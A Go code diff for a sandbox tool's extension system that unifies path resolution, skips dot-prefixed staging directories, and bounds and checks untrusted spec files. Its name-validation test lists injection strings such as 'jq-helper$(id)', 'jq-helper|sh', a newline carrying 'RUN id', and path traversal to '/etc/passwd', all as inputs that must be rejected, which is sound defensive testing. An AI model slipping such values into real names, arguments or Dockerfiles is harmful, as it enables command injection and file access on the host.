 	templatePath, ok := ResolveToolFile(paths, toolName, relativePath)
 	if !ok {
-		return "", fmt.Errorf("missing template %q, searched: %s",
-			templateName, strings.Join(toolFileCandidates(paths, toolName, relativePath), ", "))
+		return "", fmt.Errorf("missing template %q, searched: %s", templateName,
+			strings.Join(extensionFileCandidates(paths, model.KindTool, toolName, relativePath), ", "))
 	}
 	return templatePath, nil
 }
 
+// ResolveUpdateProbe resolves the check-update.sh script the automatic update
+// check runs for an extension. It searches the tool roots only.
+func ResolveUpdateProbe(paths model.Paths, name string) (string, bool) {
+	return ResolveToolFile(paths, name, model.CheckUpdateScriptFilename)
+}
+
+// UpdateProbeApplies reports whether check-update.sh is ever run for an
+// extension of specKind (model.ExtensionKindSandbox or
+// model.ExtensionKindMixin). Only sandbox extensions have an automatic update
+// check, since ResolveUpdateProbe searches the tool roots alone.
+func UpdateProbeApplies(specKind string) bool {
+	return specKind == model.ExtensionKindSandbox
+}
+
 // ResolveFeatureFile resolves a feature extension file path with user override support.
 func ResolveFeatureFile(paths model.Paths, featureName string, fileName string) (string, bool) {
-	if paths.UserFeaturesDir != "" {
-		candidate := filepath.Join(paths.UserFeaturesDir, featureName, fileName)
-		if util.FileExists(candidate) {
-			return candidate, true
+	return ResolveExtensionFile(paths, model.KindFeature, featureName, fileName)
+}
+
+// ResolveExtensionDirs returns the directories one extension of kind occupies:
+// its built-in directory and its user directory, each empty when it does not
+// exist. SourceLabel classifies the result.
+func ResolveExtensionDirs(paths model.Paths, kind model.ExtensionKind, name string) (builtinDir string, userDir string) {
+	builtinRoot, userRoot := ExtensionRoots(paths, kind)
+	if builtin := filepath.Join(builtinRoot, name); util.IsDir(builtin) {
+		builtinDir = builtin
+	}
+	if userRoot != "" {
+		if candidate := filepath.Join(userRoot, name); util.IsDir(candidate) {
+			userDir = candidate
 		}
 	}
-	candidate := filepath.Join(paths.FeaturesDir, featureName, fileName)
-	if util.FileExists(candidate) {
-		return candidate, true
-	}
-	return "", false
+	return builtinDir, userDir
 }
 
 // ResolveToolDirs returns the built-in and user tool extension directories.
 func ResolveToolDirs(paths model.Paths, toolName string) (builtinDir string, userDir string) {
-	builtin := filepath.Join(paths.ToolsDir, toolName)
-	if util.IsDir(builtin) {
-		builtinDir = builtin
-	}
-	if paths.UserToolsDir != "" {
-		candidate := filepath.Join(paths.UserToolsDir, toolName)
-		if util.IsDir(candidate) {
-			userDir = candidate
-		}
-	}
-	return builtinDir, userDir
+	return ResolveExtensionDirs(paths, model.KindTool, toolName)
 }
 
 // ResolveFeatureDirs returns the built-in and user feature extension directories.
 func ResolveFeatureDirs(paths model.Paths, featureName string) (builtinDir string, userDir string) {
-	builtin := filepath.Join(paths.FeaturesDir, featureName)
-	if util.IsDir(builtin) {
-		builtinDir = builtin
+	return ResolveExtensionDirs(paths, model.KindFeature, featureName)
+}
+
+const (
+	SourceBuiltin  = "builtin"
+	SourceUser     = "user"
+	SourceOverride = "override"
+)
+
+// SourceLabel classifies an extension's origin from its resolved built-in and
+// user directories (as returned by ResolveExtensionDirs).
+func SourceLabel(builtinDir string, userDir string) string {
+	switch {
+	case builtinDir != "" && userDir != "":
+		return SourceOverride
+	case userDir != "":
+		return SourceUser
+	default:
+		return SourceBuiltin
 	}
-	if paths.UserFeaturesDir != "" {
-		candidate := filepath.Join(paths.UserFeaturesDir, featureName)
-		if util.IsDir(candidate) {
-			userDir = candidate
-		}
-	}
-	return builtinDir, userDir
+}
+
+// LoadExtension loads an extension of kind from its spec.yaml/spec.json
+// document. It returns os.ErrNotExist (via LoadSpec) if no spec is present.
+func LoadExtension(paths model.Paths, kind model.ExtensionKind, name string) (model.Extension, error) {
+	return loadSpecExtension(paths, name, kind.SpecKind())
 }
 
 // ResolveToolSubdirs returns the existing subdir directories of a tool
@@ -157,13 +237,22 @@ func existingSubdirs(extensionDirs []string, subdir string) []string {
 // LoadToolExtension loads a tool extension from its spec.yaml/spec.json
 // document. It returns os.ErrNotExist (via LoadSpec) if no spec is present.
 func LoadToolExtension(paths model.Paths, name string) (model.Extension, error) {
-	return loadSpecExtension(paths, name, KindSandbox, model.ExtensionKindSandbox)
+	return LoadExtension(paths, model.KindTool, name)
 }
 
 // LoadFeatureExtension loads a feature extension from its spec.yaml/spec.json
 // document. It returns os.ErrNotExist (via LoadSpec) if no spec is present.
 func LoadFeatureExtension(paths model.Paths, name string) (model.Extension, error) {
-	return loadSpecExtension(paths, name, KindMixin, model.ExtensionKindMixin)
+	return LoadExtension(paths, model.KindFeature, name)
+}
+
+// ListExtensionDirNames returns the name of every extension directory of kind
+// under either root, whether or not it holds a loadable spec. This is the
+// enumeration a management command needs: an extension whose spec stopped
+// parsing — an upstream schemaVersion bump is enough — still occupies a
+// directory, and remove is the recovery path for it.
+func ListExtensionDirNames(paths model.Paths, kind model.ExtensionKind) ([]string, error) {
+	return listExtensionDirNames(ExtensionRoots(paths, kind))
 }
 
 // ListTools returns all tool extension names from both built-in and user extension roots.
@@ -175,25 +264,20 @@ func ListTools(paths model.Paths) ([]string, error) {
 // both the built-in and the user root, that carry a spec document. Unlike
 // ListFeatures it never loads those specs, so a name it returns may still fail
 // to load.
-func listSpecNames(paths model.Paths, kind string) ([]string, error) {
-	var builtinDir, userDir string
-	switch kind {
-	case KindSandbox:
-		builtinDir, userDir = paths.ToolsDir, paths.UserToolsDir
-	case KindMixin:
-		builtinDir, userDir = paths.FeaturesDir, paths.UserFeaturesDir
-	default:
-		return nil, fmt.Errorf("unknown extension kind %q", kind)
+func listSpecNames(paths model.Paths, specKind string) ([]string, error) {
+	kind, known := model.ExtensionKindFor(specKind)
+	if !known {
+		return nil, fmt.Errorf("unknown extension kind %q", specKind)
 	}
 
-	names, err := listExtensionNames(builtinDir, userDir)
+	names, err := listExtensionDirNames(ExtensionRoots(paths, kind))
 	if err != nil {
 		return nil, err
 	}
 
 	var withSpec []string
 	for _, name := range names {
-		if hasSpecFile(paths, name, kind) {
+		if hasSpecFile(paths, name, specKind) {
 			withSpec = append(withSpec, name)
 		}
 	}
@@ -230,7 +314,9 @@ func ListFeatures(paths model.Paths) ([]model.Extension, error) {
 	return features, nil
 }
 
-func listExtensionNames(primaryDir string, secondaryDir string) ([]string, error) {
+// listExtensionDirNames merges the extension directory names found in two
+// roots, sorted and deduplicated.
+func listExtensionDirNames(primaryDir string, secondaryDir string) ([]string, error) {
 	names := map[string]struct{}{}
 	if err := appendExtensionNames(primaryDir, names); err != nil {
 		return nil, err
@@ -260,12 +346,22 @@ func appendExtensionNames(dir string, names map[string]struct{}) error {
 		return err
 	}
 	for _, entry := range entries {
-		if !entry.IsDir() {
+		if !isExtensionDir(entry) {
 			continue
 		}
 		names[entry.Name()] = struct{}{}
 	}
 	return nil
+}
+
+// isExtensionDir reports whether a directory entry of an extension root is an
+// extension. Dot-prefixed names never are: that is what keeps the extension
+// installer's own staging directories (.incoming-*, .replaced-*) and stray
+// dotfiles from being listed, loaded, or validated as extensions, and
+// extinstall.validExtensionName relies on it by refusing to install under a
+// dot-prefixed name.
+func isExtensionDir(entry fs.DirEntry) bool {
+	return entry.IsDir() && !strings.HasPrefix(entry.Name(), ".")
 }
 
 // extensionManifestState records which optional extension-level fields were

--- a/internal/config/extension_name_test.go
+++ b/internal/config/extension_name_test.go
@@ -1,0 +1,62 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package config
+
+import "testing"
+
+// TestValidateExtensionNameRejectsUnsafeNames pins the charset that keeps an
+// extension name safe in every position it later occupies: a path segment
+// under the user extension directory, a build-context path, a Dockerfile
+// comment, a COPY operand, a build stage name, and a FEATURES assignment in a
+// shell-form RUN. A name reaching those positions can come straight from an
+// untrusted repository's spec.yaml, so the rejected set below is deliberately
+// wider than "cannot be used as a filename".
+func TestValidateExtensionNameRejectsUnsafeNames(t *testing.T) {
+	rejected := map[string]string{
+		"empty":              "",
+		"dot":                ".",
+		"dotdot":             "..",
+		"traversal":          "../../../etc/evil",
+		"forward slash":      "a/b",
+		"back slash":         "a\\b",
+		"absolute":           "/etc/passwd",
+		"dot prefix":         ".hidden-name",
+		"command sub":        "jq-helper$(id)",
+		"backtick":           "jq-helper`id`",
+		"variable":           "jq-helper${HOME}",
+		"semicolon":          "jq-helper;id",
+		"pipe":               "jq-helper|sh",
+		"space":              "jq helper",
+		"newline":            "jq-helper\nRUN id",
+		"carriage return":    "jq-helper\rRUN id",
+		"escape sequence":    "jq-helper\x1b[2J",
+		"double quote":       "jq-\"helper",
+		"single quote":       "jq-'helper",
+		"uppercase":          "JqHelper",
+		"leading dash":       "-helper",
+		"leading underscore": "_helper",
+	}
+	for label, name := range rejected {
+		if err := ValidateExtensionName(name); err == nil {
+			t.Errorf("ValidateExtensionName(%q) [%s] = nil, want an error", name, label)
+		}
+	}
+
+	// Every built-in extension name must remain acceptable.
+	accepted := []string{
+		"claude", "codex", "mistral-vibe", "opencode", "pi", "theia", "theia-next",
+		"debug-tools", "devtools", "github-cli", "gitlab-cli", "node-dev",
+		"playwright", "python-dev", "shell-extras",
+		"foo", "foo_bar", "foo.bar", "a", "0", "tool2",
+	}
+	for _, name := range accepted {
+		if err := ValidateExtensionName(name); err != nil {
+			t.Errorf("ValidateExtensionName(%q) = %v, want nil", name, err)
+		}
+	}
+}

--- a/internal/config/extension_overlay_test.go
+++ b/internal/config/extension_overlay_test.go
@@ -157,6 +157,29 @@ func TestResolveToolAndFeatureDirs(t *testing.T) {
 	}
 }
 
+// TestSourceLabel covers the builtin/user/override classification of a
+// resolved extension directory pair.
+func TestSourceLabel(t *testing.T) {
+	cases := []struct {
+		name       string
+		builtinDir string
+		userDir    string
+		want       string
+	}{
+		{"builtin only", "/builtin/foo", "", SourceBuiltin},
+		{"user only", "", "/user/foo", SourceUser},
+		{"both", "/builtin/foo", "/user/foo", SourceOverride},
+		{"neither", "", "", SourceBuiltin},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			if got := SourceLabel(tc.builtinDir, tc.userDir); got != tc.want {
+				t.Errorf("SourceLabel(%q, %q) = %q, want %q", tc.builtinDir, tc.userDir, got, tc.want)
+			}
+		})
+	}
+}
+
 func TestListToolsMergesAndDeduplicates(t *testing.T) {
 	tmp := t.TempDir()
 	builtinTools := filepath.Join(tmp, "extensions", "tools")
@@ -200,6 +223,23 @@ func TestListFeaturesMergesAndDeduplicates(t *testing.T) {
 	want := []string{"shared", "python-dev", "github-cli"}
 	if !reflect.DeepEqual(names, want) {
 		t.Fatalf("ListFeatures names=%v want=%v", names, want)
+	}
+}
+
+func TestListFeaturesSkipsDotDirectories(t *testing.T) {
+	tmp := t.TempDir()
+	builtinFeatures := filepath.Join(tmp, "extensions", "features")
+	userFeatures := filepath.Join(tmp, ".enclave", "extensions", "features")
+	writeTestFile(t, filepath.Join(userFeatures, "foo", SpecFilename), `{"schemaVersion":"1","kind":"mixin","name":"foo"}`)
+	writeTestFile(t, filepath.Join(userFeatures, ".incoming-1234", "foo", SpecFilename), `{"schemaVersion":"1","kind":"mixin","name":"foo"}`)
+
+	paths := model.Paths{FeaturesDir: builtinFeatures, UserFeaturesDir: userFeatures}
+	features, err := ListFeatures(paths)
+	if err != nil {
+		t.Fatalf("ListFeatures: %v", err)
+	}
+	if len(features) != 1 || features[0].Name != "foo" {
+		t.Fatalf("features = %+v, want only foo", features)
 	}
 }
 

--- a/internal/config/extension_update_probe_test.go
+++ b/internal/config/extension_update_probe_test.go
@@ -1,0 +1,56 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package config
+
+import (
+	"os"
+	"path/filepath"
+	"testing"
+
+	"enclave/internal/model"
+)
+
+// TestUpdateProbeApplies pins the rule that only a sandbox extension's
+// check-update.sh is ever executed, which ResolveUpdateProbe implements by
+// searching the tool roots alone and extinstall discloses to users.
+func TestUpdateProbeApplies(t *testing.T) {
+	if !UpdateProbeApplies(model.ExtensionKindSandbox) {
+		t.Error("UpdateProbeApplies(sandbox) = false, want true")
+	}
+	if UpdateProbeApplies(model.ExtensionKindMixin) {
+		t.Error("UpdateProbeApplies(mixin) = true, want false")
+	}
+	if UpdateProbeApplies("") {
+		t.Error("UpdateProbeApplies(\"\") = true, want false")
+	}
+}
+
+// TestResolveUpdateProbeSearchesToolRootsOnly is the other half of the rule: a
+// mixin shipping the same filename is never resolved, so it is never run.
+func TestResolveUpdateProbeSearchesToolRootsOnly(t *testing.T) {
+	root := t.TempDir()
+	paths := model.Paths{
+		ToolsDir:    filepath.Join(root, "extensions", "tools"),
+		FeaturesDir: filepath.Join(root, "extensions", "features"),
+	}
+	for _, dir := range []string{filepath.Join(paths.ToolsDir, "atool"), filepath.Join(paths.FeaturesDir, "afeature")} {
+		if err := os.MkdirAll(dir, 0o750); err != nil {
+			t.Fatalf("mkdir %s: %v", dir, err)
+		}
+		if err := os.WriteFile(filepath.Join(dir, model.CheckUpdateScriptFilename), []byte("#!/bin/sh\n"), 0o700); err != nil {
+			t.Fatalf("write probe in %s: %v", dir, err)
+		}
+	}
+
+	if _, found := ResolveUpdateProbe(paths, "atool"); !found {
+		t.Error("a tool's check-update.sh was not resolved")
+	}
+	if _, found := ResolveUpdateProbe(paths, "afeature"); found {
+		t.Error("a feature's check-update.sh was resolved; it must never be executed")
+	}
+}

--- a/internal/config/paths.go
+++ b/internal/config/paths.go
@@ -47,8 +47,8 @@ func ResolvePaths() (model.Paths, error) {
 		GatewayDockerfile: filepath.Join(root, appRootGatewayDockerfileRel),
 		GatewayEntrypoint: filepath.Join(root, appRootGatewayEntrypointRel),
 		ExtensionsDir:     extensionsDir,
-		ToolsDir:          filepath.Join(extensionsDir, "tools"),
-		FeaturesDir:       filepath.Join(extensionsDir, "features"),
+		ToolsDir:          filepath.Join(extensionsDir, model.KindTool.DirName()),
+		FeaturesDir:       filepath.Join(extensionsDir, model.KindFeature.DirName()),
 		AllowlistsDir:     filepath.Join(root, appRootRuntimeAssetsRel, GatewayAllowlistsDirName),
 		BuildScriptsDir:   filepath.Join(root, appRootRuntimeAssetsRel, appRootBuildScriptsRel),
 	}
@@ -61,6 +61,8 @@ func ResolvePaths() (model.Paths, error) {
 	return paths, nil
 }
 
+// resolveUserExtensionPaths records where user extensions live, whether or not
+// anything is there yet.
 func resolveUserExtensionPaths(paths *model.Paths) {
 	home, err := ResolveHostHome()
 	if err != nil || home == "" {
@@ -68,14 +70,16 @@ func resolveUserExtensionPaths(paths *model.Paths) {
 	}
 
 	userExtensionsDir := HostExtensionsDir(home)
-	info, err := os.Stat(userExtensionsDir)
-	if err != nil || !info.IsDir() {
-		return
-	}
-
 	paths.UserExtensionsDir = userExtensionsDir
-	paths.UserToolsDir = filepath.Join(userExtensionsDir, "tools")
-	paths.UserFeaturesDir = filepath.Join(userExtensionsDir, "features")
+	paths.UserToolsDir = filepath.Join(userExtensionsDir, model.KindTool.DirName())
+	paths.UserFeaturesDir = filepath.Join(userExtensionsDir, model.KindFeature.DirName())
+}
+
+// HasUserExtensions reports whether the user extension root exists on disk.
+// model.Paths always names the root, so this is the only way to tell it apart
+// from a host that has never installed an extension.
+func HasUserExtensions(paths model.Paths) bool {
+	return util.IsDir(paths.UserExtensionsDir)
 }
 
 func ResolveProject() (model.Project, error) {

--- a/internal/config/paths_user_extensions_test.go
+++ b/internal/config/paths_user_extensions_test.go
@@ -1,0 +1,63 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package config
+
+import (
+	"os"
+	"path/filepath"
+	"testing"
+
+	"enclave/internal/model"
+)
+
+// TestResolveUserExtensionPathsIndependentOfDisk pins that the user extension
+// paths say where extensions live, not whether any are installed: `add` needs
+// to know where the very first one goes on a machine that has never had the
+// directory.
+func TestResolveUserExtensionPathsIndependentOfDisk(t *testing.T) {
+	home := t.TempDir()
+	t.Setenv("HOME", home)
+	t.Setenv("XDG_CONFIG_HOME", filepath.Join(home, ".config"))
+
+	var paths model.Paths
+	resolveUserExtensionPaths(&paths)
+
+	want := HostExtensionsDir(home)
+	if paths.UserExtensionsDir != want {
+		t.Fatalf("UserExtensionsDir = %q, want %q", paths.UserExtensionsDir, want)
+	}
+	if paths.UserToolsDir != filepath.Join(want, "tools") {
+		t.Fatalf("UserToolsDir = %q", paths.UserToolsDir)
+	}
+	if paths.UserFeaturesDir != filepath.Join(want, "features") {
+		t.Fatalf("UserFeaturesDir = %q", paths.UserFeaturesDir)
+	}
+	if HasUserExtensions(paths) {
+		t.Fatal("HasUserExtensions = true for a root that does not exist")
+	}
+
+	if err := os.MkdirAll(want, 0o750); err != nil {
+		t.Fatalf("mkdir %s: %v", want, err)
+	}
+	if !HasUserExtensions(paths) {
+		t.Fatal("HasUserExtensions = false for an existing root")
+	}
+}
+
+func TestHasUserExtensionsRejectsUnsetAndNonDirectory(t *testing.T) {
+	if HasUserExtensions(model.Paths{}) {
+		t.Error("HasUserExtensions = true for unset paths")
+	}
+	file := filepath.Join(t.TempDir(), "extensions")
+	if err := os.WriteFile(file, nil, 0o600); err != nil {
+		t.Fatalf("write %s: %v", file, err)
+	}
+	if HasUserExtensions(model.Paths{UserExtensionsDir: file}) {
+		t.Error("HasUserExtensions = true for a regular file")
+	}
+}

--- a/internal/config/spec_loader.go
+++ b/internal/config/spec_loader.go
@@ -27,23 +27,11 @@ func LoadSpec(paths model.Paths, name string, kind string) (specDocument, error)
 		return specDocument{}, os.ErrNotExist
 	}
 
-	// #nosec G304 -- specPath is resolved from trusted extension roots.
-	data, err := os.ReadFile(specPath)
+	doc, err := parseSpecDocument(specPath)
 	if err != nil {
 		return specDocument{}, err
 	}
 
-	// Strict parsing: unknown keys and duplicate keys are load errors, so a
-	// typo'd field (e.g. a misspelled network: or deniedDomains:) can never
-	// silently disable deny rules or credential-release validation.
-	var doc specDocument
-	if err := yaml.UnmarshalStrict(data, &doc); err != nil {
-		return specDocument{}, fmt.Errorf("parse %s: %w", specPath, err)
-	}
-
-	if doc.SchemaVersion != SpecSchemaVersion {
-		return specDocument{}, fmt.Errorf("%s schemaVersion must be %q (got %q)", specPath, SpecSchemaVersion, doc.SchemaVersion)
-	}
 	if doc.Kind != kind {
 		return specDocument{}, fmt.Errorf("%s kind must be %q", specPath, kind)
 	}
@@ -86,30 +74,60 @@ func warnUnknownFilesEntries(filesDir string, name string, warn func(string)) {
 	}
 	for _, entry := range entries {
 		switch entry.Name() {
-		case "home", "workspace":
+		case model.ExtensionFilesHomeDir, model.ExtensionFilesWorkspaceDir:
 			continue
 		default:
-			warn(fmt.Sprintf("extension %q: %s is not a recognized files/ entry (only home and workspace are honored); ignoring", name, filepath.Join(filesDir, entry.Name())))
+			warn(fmt.Sprintf("extension %q: %s is not a recognized files/ entry (only %s and %s are honored); ignoring",
+				name, filepath.Join(filesDir, entry.Name()), model.ExtensionFilesHomeDir, model.ExtensionFilesWorkspaceDir))
 		}
 	}
 }
 
+// parseSpecDocument reads and strict-parses the spec document at specPath.
+// Unknown and duplicate keys are load errors, so a typo'd field (a misspelled
+// network: or deniedDomains:) cannot silently disable deny rules or
+// credential-release validation.
+func parseSpecDocument(specPath string) (specDocument, error) {
+	// #nosec G304 -- specPath names a spec file found inside an extension
+	// directory the caller has already resolved or contained.
+	data, err := os.ReadFile(specPath)
+	if err != nil {
+		return specDocument{}, err
+	}
+
+	var doc specDocument
+	if err := yaml.UnmarshalStrict(data, &doc); err != nil {
+		return specDocument{}, fmt.Errorf("parse %s: %w", specPath, err)
+	}
+	if doc.SchemaVersion != SpecSchemaVersion {
+		return specDocument{}, fmt.Errorf("%s schemaVersion must be %q (got %q)", specPath, SpecSchemaVersion, doc.SchemaVersion)
+	}
+	return doc, nil
+}
+
+// ownSpecFile finds dir's own spec.yaml, falling back to spec.json, without
+// user-override resolution.
+func ownSpecFile(dir string) (string, bool) {
+	for _, name := range []string{SpecFilename, SpecFilenameJSON} {
+		path := filepath.Join(dir, name)
+		if util.FileExists(path) {
+			return path, true
+		}
+	}
+	return "", false
+}
+
 // resolveSpecFile finds spec.yaml, falling back to spec.json, via the same
 // user-override-then-built-in resolution used for extension files.
-func resolveSpecFile(paths model.Paths, name string, kind string) (string, bool) {
-	var resolve func(model.Paths, string, string) (string, bool)
-	switch kind {
-	case KindSandbox:
-		resolve = ResolveToolFile
-	case KindMixin:
-		resolve = ResolveFeatureFile
-	default:
+func resolveSpecFile(paths model.Paths, name string, specKind string) (string, bool) {
+	kind, known := model.ExtensionKindFor(specKind)
+	if !known {
 		return "", false
 	}
-	if p, ok := resolve(paths, name, SpecFilename); ok {
+	if p, ok := ResolveExtensionFile(paths, kind, name, SpecFilename); ok {
 		return p, true
 	}
-	if p, ok := resolve(paths, name, SpecFilenameJSON); ok {
+	if p, ok := ResolveExtensionFile(paths, kind, name, SpecFilenameJSON); ok {
 		return p, true
 	}
 	return "", false
@@ -143,17 +161,17 @@ func specSourceLabel(name string) string {
 
 // loadSpecExtension loads a spec.yaml/spec.json document as name and maps it
 // onto a validated model.Extension.
-func loadSpecExtension(paths model.Paths, name string, kind string, expectedType string) (model.Extension, error) {
-	doc, err := LoadSpec(paths, name, kind)
+func loadSpecExtension(paths model.Paths, name string, specKind string) (model.Extension, error) {
+	doc, err := LoadSpec(paths, name, specKind)
 	if err != nil {
 		return model.Extension{}, err
 	}
 
 	ext, state := specToExtension(doc)
-	ext = applyExtensionDefaults(ext, name, expectedType, state)
+	ext = applyExtensionDefaults(ext, name, specKind, state)
 
 	label := specSourceLabel(name)
-	if err := validateExtensionIdentity(ext, name, expectedType, label); err != nil {
+	if err := validateExtensionIdentity(ext, name, specKind, label); err != nil {
 		return model.Extension{}, err
 	}
 	if err := validateAndNormalizeExtension(&ext, label); err != nil {

--- a/internal/config/spec_loader.go
+++ b/internal/config/spec_loader.go
@@ -9,6 +9,7 @@ package config
 
 import (
 	"fmt"
+	"io"
 	"os"
 	"path/filepath"
 
@@ -83,6 +84,10 @@ func warnUnknownFilesEntries(filesDir string, name string, warn func(string)) {
 	}
 }
 
+// maxSpecBytes bounds a spec document read from a source whose files have not
+// been sanitized yet. Real specs are a few kilobytes.
+const maxSpecBytes = 1 << 20
+
 // parseSpecDocument reads and strict-parses the spec document at specPath.
 // Unknown and duplicate keys are load errors, so a typo'd field (a misspelled
 // network: or deniedDomains:) cannot silently disable deny rules or
@@ -94,7 +99,41 @@ func parseSpecDocument(specPath string) (specDocument, error) {
 	if err != nil {
 		return specDocument{}, err
 	}
+	return decodeSpecDocument(data, specPath)
+}
 
+// parseUntrustedSpecDocument is parseSpecDocument for a document that has not
+// been through the installer's symlink and size rules yet: the installer
+// classifies the candidates of a fetched repository before it copies anything,
+// and a spec committed there as a symlink would otherwise hand the parser a
+// FIFO, a device, or a file from the host.
+func parseUntrustedSpecDocument(specPath string) (specDocument, error) {
+	info, err := os.Lstat(specPath)
+	if err != nil {
+		return specDocument{}, err
+	}
+	if !info.Mode().IsRegular() {
+		return specDocument{}, fmt.Errorf("%s is not a regular file", specPath)
+	}
+	// #nosec G304 -- specPath names a spec file inside a directory the caller
+	// has contained, and was just confirmed to be a regular file.
+	file, err := os.Open(specPath)
+	if err != nil {
+		return specDocument{}, err
+	}
+	defer func() { _ = file.Close() }()
+
+	data, err := io.ReadAll(io.LimitReader(file, maxSpecBytes+1))
+	if err != nil {
+		return specDocument{}, err
+	}
+	if len(data) > maxSpecBytes {
+		return specDocument{}, fmt.Errorf("%s is larger than %d bytes", specPath, maxSpecBytes)
+	}
+	return decodeSpecDocument(data, specPath)
+}
+
+func decodeSpecDocument(data []byte, specPath string) (specDocument, error) {
 	var doc specDocument
 	if err := yaml.UnmarshalStrict(data, &doc); err != nil {
 		return specDocument{}, fmt.Errorf("parse %s: %w", specPath, err)

--- a/internal/config/spec_map.go
+++ b/internal/config/spec_map.go
@@ -129,6 +129,15 @@ func validateEntrypointArgv(doc specDocument, specPath string) error {
 	return check("args", doc.Sandbox.Entrypoint.Args)
 }
 
+// entrypointCommand renders an entrypoint as a single command string. Args are
+// folded after run because the result is split back into fields by the runtime
+// command builder, so trailing flags in entrypoint.args flow through as
+// additional argv tokens.
+func entrypointCommand(entrypoint *specEntrypoint) string {
+	argv := append(append([]string(nil), entrypoint.Run...), entrypoint.Args...)
+	return strings.Join(argv, " ")
+}
+
 // normalizeInstallUser applies sbx's commands.install default: an omitted or
 // blank user means root ("0").
 func normalizeInstallUser(user string) string {
@@ -138,29 +147,46 @@ func normalizeInstallUser(user string) string {
 	return user
 }
 
+// IsRootInstallUser reports whether a commands.install entry runs as root,
+// applying the omitted-means-root default.
+func IsRootInstallUser(user string) bool {
+	switch normalizeInstallUser(user) {
+	case "0", "root":
+		return true
+	default:
+		return false
+	}
+}
+
+// serviceHostsByID unions network.serviceDomains (host -> id, inverted) with
+// each serviceAuth entry's own Hosts (enclave-native), deduped and sorted per
+// service id. serviceAuth.Hosts covers the multi-service-same-host case (e.g.
+// gitlab's three tokens on the same hosts) that the host->single-service
+// serviceDomains map cannot express.
+func serviceHostsByID(doc specDocument) map[string][]string {
+	hostsByService := map[string][]string{}
+	if doc.Network == nil {
+		return hostsByService
+	}
+	for host, id := range doc.Network.ServiceDomains {
+		hostsByService[id] = append(hostsByService[id], host)
+	}
+	for id, auth := range doc.Network.ServiceAuth {
+		hostsByService[id] = append(hostsByService[id], auth.Hosts...)
+	}
+	for id := range hostsByService {
+		hostsByService[id] = sortDedupeStrings(hostsByService[id])
+	}
+	return hostsByService
+}
+
 // buildSecrets reconstructs model.SecretConfig entries from the split
 // credentials.sources + network.serviceDomains/serviceAuth representation.
 func buildSecrets(doc specDocument) map[string]model.SecretConfig {
 	if doc.Credentials == nil || len(doc.Credentials.Sources) == 0 {
 		return nil
 	}
-	// service-id -> hosts, unioned from serviceDomains (host -> id inversion)
-	// and each serviceAuth entry's own Hosts (enclave-native), then deduped
-	// and sorted. serviceAuth.Hosts covers the multi-service-same-host case
-	// (e.g. gitlab's three tokens on the same hosts) that the host->single-
-	// service serviceDomains map cannot express.
-	hostsByService := map[string][]string{}
-	if doc.Network != nil {
-		for host, id := range doc.Network.ServiceDomains {
-			hostsByService[id] = append(hostsByService[id], host)
-		}
-		for id, auth := range doc.Network.ServiceAuth {
-			hostsByService[id] = append(hostsByService[id], auth.Hosts...)
-		}
-		for id := range hostsByService {
-			hostsByService[id] = sortDedupeStrings(hostsByService[id])
-		}
-	}
+	hostsByService := serviceHostsByID(doc)
 	out := make(map[string]model.SecretConfig, len(doc.Credentials.Sources))
 	for id, src := range doc.Credentials.Sources {
 		sc := model.SecretConfig{EnvVars: append([]string(nil), src.Env...)}
@@ -295,11 +321,7 @@ func specToProfile(doc specDocument) model.Profile {
 	}
 
 	if sb.Entrypoint != nil && len(sb.Entrypoint.Run) > 0 {
-		// Args are folded after Run: Command is later split back into fields by
-		// the runtime command builder, so trailing flags in entrypoint.args flow
-		// through as additional argv tokens rather than being silently dropped.
-		argv := append(append([]string(nil), sb.Entrypoint.Run...), sb.Entrypoint.Args...)
-		p.Command = strings.Join(argv, " ")
+		p.Command = entrypointCommand(sb.Entrypoint)
 	} else {
 		p.Command = doc.Name
 	}
@@ -331,6 +353,7 @@ func specToProfile(doc specDocument) model.Profile {
 func specToExtension(doc specDocument) (model.Extension, extensionManifestState) {
 	ext := model.Extension{
 		Name:        doc.Name,
+		DisplayName: doc.DisplayName,
 		Description: doc.Description,
 		AptPackages: doc.AptPackages,
 		NeedsRoot:   doc.NeedsRoot,

--- a/internal/config/spec_map_test.go
+++ b/internal/config/spec_map_test.go
@@ -322,6 +322,7 @@ func TestSpecToExtensionMixin(t *testing.T) {
 schemaVersion: "1"
 kind: mixin
 name: github-cli
+displayName: GitHub CLI
 description: GitHub CLI (gh)
 needsRoot: true
 priority: 50
@@ -337,6 +338,9 @@ network:
 	ext, state := specToExtension(doc)
 	if ext.Type != model.ExtensionKindMixin || ext.Name != "github-cli" {
 		t.Fatalf("kind->type wrong: %+v", ext)
+	}
+	if ext.DisplayName != "GitHub CLI" {
+		t.Fatalf("DisplayName = %q, want %q", ext.DisplayName, "GitHub CLI")
 	}
 	if !ext.NeedsRoot || ext.ConfigDir != ".config/gh" || len(ext.AuthFiles) != 2 {
 		t.Fatalf("mixin fields wrong: %+v", ext)

--- a/internal/config/spec_summary.go
+++ b/internal/config/spec_summary.go
@@ -1,0 +1,228 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package config
+
+import (
+	"fmt"
+	"os"
+	"sort"
+	"strings"
+
+	"enclave/internal/model"
+)
+
+// SpecInitFileSummary describes one commands.initFiles entry.
+type SpecInitFileSummary struct {
+	Path          string
+	OnlyIfMissing bool
+}
+
+// SpecCredentialSource describes one credentials.sources entry: which env
+// aliases it fills, which host file (if any) it can also be read from, and —
+// the most consequential grant in the schema — whether it is released as an
+// HTTP header to a set of hosts via network.serviceDomains/serviceAuth.
+type SpecCredentialSource struct {
+	ID            string
+	Env           []string
+	FilePath      string
+	FileParser    string
+	ReleaseHeader string
+	ReleaseHosts  []string
+}
+
+// SpecProviderSummary projects one providers[] entry: the auth files and
+// session detection it declares, the OAuth callback ports it opens, and the
+// env var (if any) it uses to locate its credential-storage directory.
+type SpecProviderSummary struct {
+	Name                string
+	AuthFiles           []string
+	AuthSession         bool
+	AuthSessionMode     string
